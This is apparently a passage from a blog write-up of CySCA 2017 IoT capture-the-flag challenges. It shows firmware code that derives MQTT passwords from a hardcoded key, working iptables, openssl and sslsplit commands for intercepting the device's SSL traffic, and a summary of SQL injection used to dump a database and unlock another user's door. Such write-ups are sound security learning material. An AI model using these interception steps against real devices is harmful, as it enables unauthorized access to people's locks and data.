k = "faeQuaijeiFee8peet3Jeush9shieMiechee0aen"
d = bytearray(k+mac+username+k)
pw_hash = uhashlib.sha1(d)
pw = ubinascii.hexlify(pw_hash.digest()).decode("utf-8").upper()
return pw
Additionally, we found a
file with the following two interesting lines inside:
self.passwd = mqttpasswd.genpw(self.mac,self.username)
self.client = MQTTClient(self.mac, self.server, self.port, self.mac, self.passwd, 0, ssl=True)
From the above, we gather that the communications this door control firmware sends out is based on the MQTT protocol, and is encapsulated using SSL. Additionally, we find in the code that the device talks to doorctrl.cysca
on port 8883
Our task was to intercept the SSL traffic sent from the device so that we can see and/or modify the data. There are a couple of different ways in which we could achieve this MITM attack:
- ARP spoof both the server and the client so that they both communicate through us
- Intercept the DNS reply to tell the IoT device that we are the doorctrl web server
- Or edit our hosts file to send traffic destined for
to an intercepting proxy. This proxy would then relay the traffic to the real web server. - Use iptables port forwarding to send traffic to our proxy
Let's try the last option. We flush the iptables rules we currently have, and then use a PREROUTING rule to forward all traffic destined for the doorctrl web server to our local IP address on the wi-fi network:
# iptables -t nat -F
# iptables -t nat -A PREROUTING -d -p tcp --dport 8883 -j DNAT --to-destination
Additionally, to intercept SSL traffic, we need to first create our own self-signed certificate with a private key so that we can present it to the IoT device and pretend to be the real server. We create these files as follows:
# openssl genrsa -out ca.key 4096
# openssl req -new -x509 -days 1826 -key ca.key -out ca.crt
Now we can use sslsplit with the generated certificate and private above to man-in-the-middle traffic between the IoT device and the web server:
# sslsplit -D -l connections.log -j /root/Documents/CySCA/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 8883 8883
Once traffic is sent from the device to our sslsplit instance, we get the flag: FLAG{HQVYBHPSG4BA499ZFCUH4E6414J41887}
Challenge 4: Sanitize All Inputs
Unfortunately I did not get to complete challenge 4 and 5 of the IoT challenges, but here is a summary of the tasks involved in these challenges:
- Use python to create my own SSL interception and modification proxy. Example code for this can be found here.
- Intercept requests made to the web server, and find an SQL injection vulnerability using the data sent in the MQTT protocol.
- Use the SQL injection to dump the database
Challenge 5 involved using the SQL injection to unlock another person's door lock using their MAC address and my door unlocker IoT device.
And those were the challenges I found the most interesting in CySCA 2017! Again, thank you to the challenge writers for providing this amazing learning experience!
Live and Learn!
CySCA 2017 in a box:
CySCA 2017 IoT in a box: